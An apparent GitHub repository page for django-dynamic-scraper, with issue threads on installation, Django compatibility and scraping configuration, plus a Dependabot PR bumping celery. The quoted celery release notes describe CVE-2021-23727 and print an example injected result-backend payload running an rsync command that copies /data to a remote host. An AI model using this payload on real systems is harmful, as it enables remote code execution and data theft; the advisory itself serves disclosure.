Creating Scrapy scrapers via the Django admin interface

Overview

django-dynamic-scraper

Django Dynamic Scraper (DDS) is an app for Django which builds on top of the scraping framework Scrapy and lets you create and manage Scrapy spiders via the Django admin interface. It was originally developed for german webtv program site http://fernsehsuche.de.

Documentation

Read more about DDS in the ReadTheDocs documentation:

Getting Help/Updates

There is a mailing list on Google Groups, feel free to ask questions or make suggestions:

Infos about new releases and updates on Twitter:

Comments
  • Allow the user to customize the scraper

    Allow the user to customize the scraper

    I am a newbie to web crawler. Now I am gong to build a django web app, in a part of which users fill up a form(keywords and time,etc.) and submit it. Then the scraper will begin to work and craw the data according to the user's requirement at a specific website(set by me). After that the data will pass to another model to do some clustering work. How can I do that?

    opened by ghost 11
  • Added FOLLOW pagination type.

    Added FOLLOW pagination type.

    This only follows pages (dynamically) after crawling all of the links in the base page. If you have any interest in this PR, I can flesh out the implementation and docs.

    someday 
    opened by scott-coates 10
  • Add explicit on_delete argument to be compatible for Django 2.0.

    Add explicit on_delete argument to be compatible for Django 2.0.

    Django 2 requires explicit on_delete argument as per the following page.

    https://docs.djangoproject.com/en/2.0/releases/2.0/

    "The on_delete argument for ForeignKey and OneToOneField is now required in models and migrations. Consider squashing migrations so that you have fewer of them to update."

    This fix will suppress the Django 2.0 warnings in Django 1.x and fix the compatibility issue for Django 2.

    opened by ryokamiya 9
  • can't run python manage.py celeryd

    can't run python manage.py celeryd

    Trying running $python manage.py celeryd -l info -B --settings=example_project.settings gives me this error: File "manage.py", line 10, in TypeError: invalid arguments

    My system info as below: Python 2.7 Celery 3.1.19 Django-celery 3.1.16 Django-celery is installed and can be seen in example_project django admin page except I got issue when running the example command. Any advise would be appreciated. Thanks.

    opened by ratha-pkh 8
  • New Django1.7 branch

    New Django1.7 branch

    Here is a small contribution to adapt the package to Django 1.7 and Scrapy 0.24. It has not been heavily tested yet, and probably needs additional feedback from the community, but it's a small contribution for those who wants to work in a more up-to-date environment.

    ps : note that this is my first PR and it might not be fitting to the general rules.

    opened by jice-lavocat 7
  • Installation Failure in Pillow req when Brew's JPEG package isn't installed

    Installation Failure in Pillow req when Brew's JPEG package isn't installed

    The Pillow requirement attempted to be installed by DDS has a dependancy with brew jpeg and throws the following error when installed either direct from GitHub or via Pip on OSX 10.13.4 and Python version 3.6.4.

    ValueError: jpeg is required unless explicitly disabled using --disable-jpeg, aborting

    Pillow's OSX's installation instructions detail how to add these dependancies. brew install libtiff libjpeg webp little-cms2

    opened by tom-price 5
  • Allow storing extra XPATHs / add another pagination option

    Allow storing extra XPATHs / add another pagination option

    Currently only 5 XPATH types are stored — STANDARD, STANDARD_UPDATE, DETAIL, BASE and IMAGE. It would be good to have another section called EXTRA.

    It is quite often that I need to access an XPATH value that might not be necessarily mapped to a model field. I my case, I need an additional XPATH for finding the next pagination link and have had to resort to using on of the other fields as a hack.

    opened by mridang 5
  • Question: IN/ACTIVE status on NewsWebsite?

    Question: IN/ACTIVE status on NewsWebsite?

    Hello,

    Quick newbie question, I have a use case where I have 3 NewsWebsite entries where all scrape the same domain url with only the keyword differentiating each other like the following

    NewsWebsite 1 url is "http://www.somewebsite.com/?q=keyword1 NewsWebsite 2 url is "http://www.somewebsite.com/?q=keyword2 etc

    this way I can filter by a keyword on the Article admin as well as only needing to create 1 scraper for all. However I notice the IN/ACTIVE status is on the scraper, thus setting the scraper INACTIVE will stop scraping for all NewsWebsite when I actually only need to disable one keyword scraping. So is there a way to accomplish this in DDS?

    Cheers

    opened by senoadiw 4
  • pre_url produces ERROR Unsupported URL scheme 'doublehttp' when rerunning scrapy after saving articles to DB

    pre_url produces ERROR Unsupported URL scheme 'doublehttp' when rerunning scrapy after saving articles to DB

    HI,

    I'm stuck in this problem, i configured a similar example to the startup project providing a detail page with 'pre_url': 'http://www.website.com'. I want it to scrape the listing every hour (using crontab) and add any new articles.

    When i run the command for the first time (Article table empty), it populates the items correctly, however if i run the command again when new article added (with scrapy crawl article_spider -a id=2 -a do_action=yes) with populated article it does scrap the page but doesn't add the new articles -

    2016-08-27 10:33:45 [scrapy] ERROR: Error downloading <GET doublehttp://www.website.com/politique/318534.html>
    Traceback (most recent call last):
      File "/home/akram/eb-virt/local/lib/python2.7/site-packages/twisted/internet/defer.py", line 1126, in _inlineCallbacks
        result = result.throwExceptionIntoGenerator(g)
      File "/home/akram/eb-virt/local/lib/python2.7/site-packages/twisted/python/failure.py", line 389, in throwExceptionIntoGenerator
        return g.throw(self.type, self.value, self.tb)
      File "/home/akram/eb-virt/local/lib/python2.7/site-packages/scrapy/core/downloader/middleware.py", line 43, in process_request
        defer.returnValue((yield download_func(request=request,spider=spider)))
      File "/home/akram/eb-virt/local/lib/python2.7/site-packages/scrapy/utils/defer.py", line 45, in mustbe_deferred
        result = f(*args, **kw)
      File "/home/akram/eb-virt/local/lib/python2.7/site-packages/scrapy/core/downloader/handlers/__init__.py", line 64, in download_request
        (scheme, self._notconfigured[scheme]))
    NotSupported: Unsupported URL scheme 'doublehttp': no handler available for that scheme
    2016-08-27 10:33:45 [scrapy] INFO: Closing spider (finished)
    

    i searched for this "doublehttp" scheme error but couldn't find anything useful.

    Versions i have -

    Twisted==16.3.2 Scrapy==1.1.2 scrapy-djangoitem==1.1.1 django-dynamic-scraper==0.11.2

    URL in DB (for an article) -

    http://www.website.com/politique/318756.html

    scraped URL without pre_url -

    /politique/318756.html

    Any hint ?

    Thank you for your consideration and for this great project.

    opened by Akramz 4
  • loaddata of example got errors

    loaddata of example got errors

    I config the example. when I run python manage.py loaddata open_news/open_news.json I got the errors below:

    $ python manage.py loaddata open_news/open_news.json Problem installing fixture 'open_news/open_news.json': Traceback (most recent call last): File "/usr/lib64/python2.7/site-packages/django/core/management/commands/loaddata.py", line 196, in handle obj.save(using=using) File "/usr/lib64/python2.7/site-packages/django/core/serializers/base.py", line 165, in save models.Model.save_base(self.object, using=using, raw=True) File "/usr/lib64/python2.7/site-packages/django/db/models/base.py", line 551, in save_base result = manager._insert([self], fields=fields, return_id=update_pk, using=using, raw=raw) File "/usr/lib64/python2.7/site-packages/django/db/models/manager.py", line 203, in _insert return insert_query(self.model, objs, fields, **kwargs) File "/usr/lib64/python2.7/site-packages/django/db/models/query.py", line 1576, in insert_query return query.get_compiler(using=using).execute_sql(return_id) File "/usr/lib64/python2.7/site-packages/django/db/models/sql/compiler.py", line 910, in execute_sql cursor.execute(sql, params) File "/usr/lib64/python2.7/site-packages/django/db/backends/util.py", line 40, in execute return self.cursor.execute(sql, params) File "/usr/lib64/python2.7/site-packages/django/db/backends/sqlite3/base.py", line 337, in execute return Database.Cursor.execute(self, query, params) IntegrityError: Could not load contenttypes.ContentType(pk=25): columns app_label, model are not unique

    What's wrong with it ?

    opened by gorf 4
  • DDS unusable with django >= 1.10

    DDS unusable with django >= 1.10

    Django 1.11.1 : We unable to add request page type 2017-05-14 16 34 55

    Django 1.9.7 : We have ability to add request page type 2017-05-14 16 36 26

    Looks like problem with registration of inline form for request page type

    DDS version in both cases - 0.12

    opened by tigrus 3
  • Bump celery from 3.1.25 to 5.2.2

    Bump celery from 3.1.25 to 5.2.2

    Bumps celery from 3.1.25 to 5.2.2.

    Release notes

    Sourced from celery's releases.

    5.2.2

    Release date: 2021-12-26 16:30 P.M UTC+2:00

    Release by: Omer Katz

    • Various documentation fixes.

    • Fix CVE-2021-23727 (Stored Command Injection security vulnerability).

      When a task fails, the failure information is serialized in the backend. In some cases, the exception class is only importable from the consumer's code base. In this case, we reconstruct the exception class so that we can re-raise the error on the process which queried the task's result. This was introduced in #4836. If the recreated exception type isn't an exception, this is a security issue. Without the condition included in this patch, an attacker could inject a remote code execution instruction such as: os.system("rsync /data [email protected]:~/data") by setting the task's result to a failure in the result backend with the os, the system function as the exception type and the payload rsync /data [email protected]:~/data as the exception arguments like so:

      {
            "exc_module": "os",
            'exc_type': "system",
            "exc_message": "rsync /data [email protected]:~/data"
      }
      

      According to my analysis, this vulnerability can only be exploited if the producer delayed a task which runs long enough for the attacker to change the result mid-flight, and the producer has polled for the task's result. The attacker would also have to gain access to the result backend. The severity of this security vulnerability is low, but we still recommend upgrading.

    v5.2.1

    Release date: 2021-11-16 8.55 P.M UTC+6:00

    Release by: Asif Saif Uddin

    • Fix rstrip usage on bytes instance in ProxyLogger.
    • Pass logfile to ExecStop in celery.service example systemd file.
    • fix: reduce latency of AsyncResult.get under gevent (#7052)
    • Limit redis version: <4.0.0.
    • Bump min kombu version to 5.2.2.
    • Change pytz>dev to a PEP 440 compliant pytz>0.dev.0.

    ... (truncated)

    Changelog

    Sourced from celery's changelog.

    5.2.2

    :release-date: 2021-12-26 16:30 P.M UTC+2:00 :release-by: Omer Katz

    • Various documentation fixes.

    • Fix CVE-2021-23727 (Stored Command Injection security vulnerability).

      When a task fails, the failure information is serialized in the backend. In some cases, the exception class is only importable from the consumer's code base. In this case, we reconstruct the exception class so that we can re-raise the error on the process which queried the task's result. This was introduced in #4836. If the recreated exception type isn't an exception, this is a security issue. Without the condition included in this patch, an attacker could inject a remote code execution instruction such as: os.system("rsync /data [email protected]:~/data") by setting the task's result to a failure in the result backend with the os, the system function as the exception type and the payload rsync /data [email protected]:~/data as the exception arguments like so:

      .. code-block:: python

        {
              "exc_module": "os",
              'exc_type': "system",
              "exc_message": "rsync /data [email protected]:~/data"
        }
      

      According to my analysis, this vulnerability can only be exploited if the producer delayed a task which runs long enough for the attacker to change the result mid-flight, and the producer has polled for the task's result. The attacker would also have to gain access to the result backend. The severity of this security vulnerability is low, but we still recommend upgrading.

    .. _version-5.2.1:

    5.2.1

    :release-date: 2021-11-16 8.55 P.M UTC+6:00 :release-by: Asif Saif Uddin

    • Fix rstrip usage on bytes instance in ProxyLogger.
    • Pass logfile to ExecStop in celery.service example systemd file.
    • fix: reduce latency of AsyncResult.get under gevent (#7052)
    • Limit redis version: <4.0.0.
    • Bump min kombu version to 5.2.2.

    ... (truncated)

    Commits

    Dependabot compatibility score

    Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


    Dependabot commands and options

    You can trigger Dependabot actions by commenting on this PR:

    • @dependabot rebase will rebase this PR
    • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
    • @dependabot merge will merge this PR after your CI passes on it
    • @dependabot squash and merge will squash and merge this PR after your CI passes on it
    • @dependabot cancel merge will cancel a previously requested merge and block automerging
    • @dependabot reopen will reopen this PR if it is closed
    • @dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
    • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
    • @dependabot use these labels will set the current labels as the default for future PRs for this repo and language
    • @dependabot use these reviewers will set the current reviewers as the default for future PRs for this repo and language
    • @dependabot use these assignees will set the current assignees as the default for future PRs for this repo and language
    • @dependabot use this milestone will set the current milestone as the default for future PRs for this repo and language

    You can disable automated security fix PRs for this repo from the Security Alerts page.

    dependencies 
    opened by dependabot[bot] 0
  • New Scrapy Support List

    New Scrapy Support List

    I will use this thread to inform u for my tests with new Scrapy releases that DDS dont support atm. Keep in mind that i use a modified version of DDS 0.13.3 but i think if they work for me, they ll work with original DDS 0.13.3 too.

    Scrapy 1.6.0 works fine, Scrapy 1.8.0 works fine

    opened by bezkos 0
  • How can I save crawled data in multi model?

    How can I save crawled data in multi model?

    Hi, thanks for DDS I want to crawl items from a website and keep history of some fields (like price) I made a separate model and connect it to main model and in pipeline handle insert price in the price model (when crawl item is saving in db) and Its ok How can I add new price to price model when price changed?

    opened by relaxdevvv 0
  • Django Dynamic Scraper: Celery Tasks not executed in Scrapyd

    Django Dynamic Scraper: Celery Tasks not executed in Scrapyd

    I started using the django dynamic scraper for my personal project.

    I created my scrapers as I should and everything works when I run scrapy crawl in a terminal Now I want to use django celery to schedule scraping. I followed everything in the tutorial (created a periodic task, ran celeryd, ran scrapyd, deployed the scrapy project, changed the scraper status to ACTIVE in the UI)

    The very first time it runs, I can see that a process is spawned in the scrapyd server. It runs once, and never run again. Even when I define a new periodic task.

    Celery keeps sending tasks, but all I see in the scrapyd is the following log: 2020-11-19T12:18:36+0200 [twisted.python.log#info] "127.0.0.1" - - [19/Nov/2020:10:18:36 +0000] "GET /listjobs.json?project=default HTTP/1.1" 200 93 "-" "Python-urllib/2.7"

    I tried to deactivate dynamic scheduling as explained in the documentation but it still does not work. My tasks are spawned only once and I can't work that way.

    If someone has already ran into this issue, I would highly appreciate the help.

    opened by benjaminelkrieff 0
  • Dynamically change the url of the

    Dynamically change the url of the "Website" component

    Hi everyone.

    I am working on a project in which I want multiple urls to be scrapped by the same scrapper. For example: Let's say I want to scrape social media profiles. I want to scrape the name and the profile picture. So I just define one scraper for this use case.

    Let's say I have the profile urls of 10000 people. How can I scrape all of these urls without defining 10000 websites in the Django Administrator ?

    Currently, what I see is that I can define one website with one hardcoded url and link it to a scraper and call the scrapy command tool with the website ID. But It doesn't give me any option to change the url dynamically.

    I can't believe that there is no such option and that's why I am asking the community if there is such an option or if I can define this specific mechanism at the model level.

    Thank you

    opened by benjaminelkrieff 0
Releases(v0.13.2)
Dude is a very simple framework for writing web scrapers using Python decorators

Dude is a very simple framework for writing web scrapers using Python decorators. The design, inspired by Flask, was to easily build a web scraper in just a few lines of code. Dude has an easy-to-learn syntax.

Ronie Martinez 326 Dec 15, 2022
Distributed Crawler Management Framework Based on Scrapy, Scrapyd, Django and Vue.js

Gerapy Distributed Crawler Management Framework Based on Scrapy, Scrapyd, Scrapyd-Client, Scrapyd-API, Django and Vue.js. Documentation Documentation

Gerapy 2.9k Jan 3, 2023
Visual scraping for Scrapy

Portia Portia is a tool that allows you to visually scrape websites without any programming knowledge required. With Portia you can annotate a web pag

Scrapinghub 8.7k Jan 5, 2023
Scrapy, a fast high-level web crawling & scraping framework for Python.

Scrapy Overview Scrapy is a fast high-level web crawling and web scraping framework, used to crawl websites and extract structured data from their pag

Scrapy project 45.5k Jan 7, 2023
An experiment to deploy a serverless infrastructure for a scrapy project.

Serverless Scrapy project This project aims to evaluate the feasibility of an architecture based on serverless technology for a web crawler using scra

José Ferraz Neto 5 Jul 8, 2022
a high-performance, lightweight and human friendly serving engine for scrapy

a high-performance, lightweight and human friendly serving engine for scrapy

Speakol Ads 30 Mar 1, 2022
Snowflake database loading utility with Scrapy integration

Snowflake Stage Exporter Snowflake database loading utility with Scrapy integration. Meant for streaming ingestion of JSON serializable objects into S

Oleg T. 0 Dec 6, 2021
download NCERT books using scrapy

download_ncert_books download NCERT books using scrapy Downloading Books: You can either use the spider by cloning this repo and following the instruc

null 1 Dec 2, 2022
Scraping news from Ucsal portal with Scrapy.

NewsScraping Esse é um projeto de raspagem das últimas noticias, de 2021, do portal da universidade Ucsal http://noosfero.ucsal.br/institucional Tecno

Crissiano Pires 0 Sep 30, 2021
a Scrapy spider that utilizes Postgres as a DB, Squid as a proxy server, Redis for de-duplication and Splash to render JavaScript. All in a microservices architecture utilizing Docker and Docker Compose

This is George's Scraping Project To get started cd into the theZoo file and run: chmod +x script.sh then: ./script.sh This will spin up a Postgres co

George Reyes 7 Nov 27, 2022
Fundamentus scrapy

Fundamentus_scrapy Baixa informacões que os outros scrapys do fundamentus não realizam. Para iniciar (python main.py), sera criado um arquivo chamado

Guilherme Silva Uchoa 1 Oct 24, 2021
Crawler do site Fundamentus.com com o uso do framework scrapy, tanto da aba detalhada como a de resumo.

Crawler do site Fundamentus.com com o uso do framework scrapy, tanto da aba detalhada como a de resumo. (Todas as infomações)

Guilherme Silva Uchoa 3 Oct 4, 2022
Scrapy-based cyber security news finder

Cyber-Security-News-Scraper Scrapy-based cyber security news finder Goal To keep up to date on the constant barrage of information within the field of

null 2 Nov 1, 2021
Searching info from Google using Python Scrapy

Python-Search-Engine-Scrapy || Python-爬虫-索引/利用爬虫获取谷歌信息**/ Searching info from Google using Python Scrapy /* 利用 PYTHON 爬虫获取天气信息,以及城市信息和资料**/ translatio

HONGVVENG 1 Jan 6, 2022
Scrapy uses Request and Response objects for crawling web sites.

Requests and Responses¶ Scrapy uses Request and Response objects for crawling web sites. Typically, Request objects are generated in the spiders and p

Md Rashidul Islam 1 Nov 3, 2021
This Spider/Bot is developed using Python and based on Scrapy Framework to Fetch some items information from Amazon

- Hello, This Project Contains Amazon Web-bot. - I've developed this bot for fething some items information on Amazon. - Scrapy Framework in Python is

Khaled Tofailieh 4 Feb 13, 2022
Amazon scraper using scrapy, a python framework for crawling websites.

#Amazon-web-scraper This is a python program, which use scrapy python framework to crawl all pages of the product and scrap products data. This progra

Akash Das 1 Dec 26, 2021
Bigdata - This Scrapy project uses Redis and Kafka to create a distributed on demand scraping cluster

Scrapy Cluster This Scrapy project uses Redis and Kafka to create a distributed

Hanh Pham Van 0 Jan 6, 2022
This is a web scraper, using Python framework Scrapy, built to extract data from the Deals of the Day section on Mercado Livre website.

Deals of the Day This is a web scraper, using the Python framework Scrapy, built to extract data such as price and product name from the Deals of the

David Souza 1 Jan 12, 2022